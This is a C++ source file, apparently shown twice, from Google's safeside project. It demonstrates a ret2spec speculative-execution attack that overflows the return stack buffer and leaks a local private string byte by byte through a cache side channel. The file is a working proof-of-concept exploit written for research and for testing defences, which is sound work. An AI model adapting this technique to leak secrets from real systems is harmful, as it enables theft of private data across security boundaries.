demos/ret2spec_sa.cc - third_party/safeside - Git at Google

 /*
  * Copyright 2019 Google LLC
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
  * You may obtain a copy of the License at
  *
  *   https://www.apache.org/licenses/LICENSE-2.0
  *
  * Unless required by applicable law or agreed to in writing, software
  * distributed under the License is distributed on an "AS IS" BASIS,
  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */

 /**
  * Demonstration of ret2spec that exploits the fact that return stack buffers
  * have limited size and they can be rewritten by recursive invocations of
  * another function.
  * We have two functions that we named after their constant return values. First
  * the ReturnsTrue function invokes itself kRecursionDepth times and in the
  * deepest invocation it calls ReturnsFalse function. Returns_false function
  * invokes itself kRecursionDepth times. All returns of the ReturnsFalse
  * function are predicted correctly, but returns of ReturnsTrue function are
  * mispredicted to the return address of the ReturnsFalse function, because all
  * RSB pointers were rewritten by ReturnsFalse invocations. We steer those
  * mispredictions to an unreachable code path with microarchitectural side
  * effects.
  **/

 #include <array>
 #include <cstring>
 #include <iostream>
 #include <vector>

 #include "cache_sidechannel.h"
 #include "instr.h"
 #include "local_content.h"
 #include "utils.h"

 // Recursion depth should be equal or greater than the RSB size, but not
 // excessively high because of the possibility of stack overflow.
 constexpr size_t kRecursionDepth = 64;
 constexpr size_t kCacheLineSize = 64;

 // Global variables used to avoid passing parameters through recursive function
 // calls. Since we flush whole stack frames from the cache, it is important not
 // to store on stack any data that might be affected by being flushed from
 // cache.
 static size_t current_offset;
 static const std::array<BigByte, 256> *oracle_ptr;

 // Return value of ReturnsFalse that never changes. Avoiding compiler
 // optimizations with it.
 bool false_value = false;
 // Pointers to stack marks in ReturnsTrue. Used for flushing the return address
 // from the cache.
 std::vector<char *> stack_mark_pointers;

 // Always returns false.
 static bool ReturnsFalse(int counter) {
   if (counter > 0) {
     if (ReturnsFalse(counter - 1)) {
       // Unreachable code. ReturnsFalse can never return true.
       const std::array<BigByte, 256> &oracle = *oracle_ptr;
       ForceRead(oracle.data() +
                 static_cast<unsigned char>(private_data[current_offset]));
       std::cout << "Dead code. Must not be printed." << std::endl;
       exit(EXIT_FAILURE);
     }
   }
   return false_value;
 }

 // Always returns true.
 static bool ReturnsTrue(int counter) {
   // Creates a stack mark and stores it to the global vector.
   char stack_mark = 'a';
   stack_mark_pointers.push_back(&stack_mark);

   if (counter > 0) {
     // Recursively invokes itself.
     ReturnsTrue(counter - 1);
   } else {
     // In the deepest invocation starts the ReturnsFalse recursion.
     ReturnsFalse(kRecursionDepth);
   }

   // Cleans-up its stack mark and flushes from the cache everything between its
   // own stack mark and the next one. Somewhere there must be also the return
   // address.
   stack_mark_pointers.pop_back();
   FlushFromCache(&stack_mark, stack_mark_pointers.back());
   return true;
 }

 static char LeakByte() {
   CacheSideChannel sidechannel;
   oracle_ptr = &sidechannel.GetOracle();
   const std::array<BigByte, 256> &oracle = *oracle_ptr;

   for (int run = 0;; ++run) {
     sidechannel.FlushOracle();

     // Stack mark for the first call of ReturnsTrue. Otherwise it would read
     // from an empty vector and crash.
     char stack_mark = 'a';
     stack_mark_pointers.push_back(&stack_mark);
     ReturnsTrue(kRecursionDepth);
     stack_mark_pointers.pop_back();

     std::pair<bool, char> result = sidechannel.AddHitAndRecomputeScores();
     if (result.first) {
       return result.second;
     }

     if (run > 100000) {
       std::cerr << "Does not converge " << result.second << std::endl;
       exit(EXIT_FAILURE);
     }
   }
 }

 int ret2spec_sa_main() {
   std::cout << "Leaking the string: ";
   std::cout.flush();
   for (size_t i = 0; i < strlen(private_data); ++i) {
     current_offset = i;
     std::cout << LeakByte();
     std::cout.flush();
   }
   std::cout << "\nDone!\n";
   return 0;
 }
	/*
	* Copyright 2019 Google LLC
	*
	* Licensed under the Apache License, Version 2.0 (the "License");
	* you may not use this file except in compliance with the License.
	* You may obtain a copy of the License at
	*
	* https://www.apache.org/licenses/LICENSE-2.0
	*
	* Unless required by applicable law or agreed to in writing, software
	* distributed under the License is distributed on an "AS IS" BASIS,
	* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
	* See the License for the specific language governing permissions and
	* limitations under the License.
	*/

	/**
	* Demonstration of ret2spec that exploits the fact that return stack buffers
	* have limited size and they can be rewritten by recursive invocations of
	* another function.
	* We have two functions that we named after their constant return values. First
	* the ReturnsTrue function invokes itself kRecursionDepth times and in the
	* deepest invocation it calls ReturnsFalse function. Returns_false function
	* invokes itself kRecursionDepth times. All returns of the ReturnsFalse
	* function are predicted correctly, but returns of ReturnsTrue function are
	* mispredicted to the return address of the ReturnsFalse function, because all
	* RSB pointers were rewritten by ReturnsFalse invocations. We steer those
	* mispredictions to an unreachable code path with microarchitectural side
	* effects.
	**/

	#include <array>
	#include <cstring>
	#include <iostream>
	#include <vector>

	#include "cache_sidechannel.h"
	#include "instr.h"
	#include "local_content.h"
	#include "utils.h"

	// Recursion depth should be equal or greater than the RSB size, but not
	// excessively high because of the possibility of stack overflow.
	constexpr size_t kRecursionDepth = 64;
	constexpr size_t kCacheLineSize = 64;

	// Global variables used to avoid passing parameters through recursive function
	// calls. Since we flush whole stack frames from the cache, it is important not
	// to store on stack any data that might be affected by being flushed from
	// cache.
	static size_t current_offset;
	static const std::array<BigByte, 256> *oracle_ptr;

	// Return value of ReturnsFalse that never changes. Avoiding compiler
	// optimizations with it.
	bool false_value = false;
	// Pointers to stack marks in ReturnsTrue. Used for flushing the return address
	// from the cache.
	std::vector<char *> stack_mark_pointers;

	// Always returns false.
	static bool ReturnsFalse(int counter) {
	if (counter > 0) {
	if (ReturnsFalse(counter - 1)) {
	// Unreachable code. ReturnsFalse can never return true.
	const std::array<BigByte, 256> &oracle = *oracle_ptr;
	ForceRead(oracle.data() +
	static_cast<unsigned char>(private_data[current_offset]));
	std::cout << "Dead code. Must not be printed." << std::endl;
	exit(EXIT_FAILURE);
	}
	}
	return false_value;
	}

	// Always returns true.
	static bool ReturnsTrue(int counter) {
	// Creates a stack mark and stores it to the global vector.
	char stack_mark = 'a';
	stack_mark_pointers.push_back(&stack_mark);

	if (counter > 0) {
	// Recursively invokes itself.
	ReturnsTrue(counter - 1);
	} else {
	// In the deepest invocation starts the ReturnsFalse recursion.
	ReturnsFalse(kRecursionDepth);
	}

	// Cleans-up its stack mark and flushes from the cache everything between its
	// own stack mark and the next one. Somewhere there must be also the return
	// address.
	stack_mark_pointers.pop_back();
	FlushFromCache(&stack_mark, stack_mark_pointers.back());
	return true;
	}

	static char LeakByte() {
	CacheSideChannel sidechannel;
	oracle_ptr = &sidechannel.GetOracle();
	const std::array<BigByte, 256> &oracle = *oracle_ptr;

	for (int run = 0;; ++run) {
	sidechannel.FlushOracle();

	// Stack mark for the first call of ReturnsTrue. Otherwise it would read
	// from an empty vector and crash.
	char stack_mark = 'a';
	stack_mark_pointers.push_back(&stack_mark);
	ReturnsTrue(kRecursionDepth);
	stack_mark_pointers.pop_back();

	std::pair<bool, char> result = sidechannel.AddHitAndRecomputeScores();
	if (result.first) {
	return result.second;
	}

	if (run > 100000) {
	std::cerr << "Does not converge " << result.second << std::endl;
	exit(EXIT_FAILURE);
	}
	}
	}

	int ret2spec_sa_main() {
	std::cout << "Leaking the string: ";
	std::cout.flush();
	for (size_t i = 0; i < strlen(private_data); ++i) {
	current_offset = i;
	std::cout << LeakByte();
	std::cout.flush();
	}
	std::cout << "\nDone!\n";
	return 0;
	}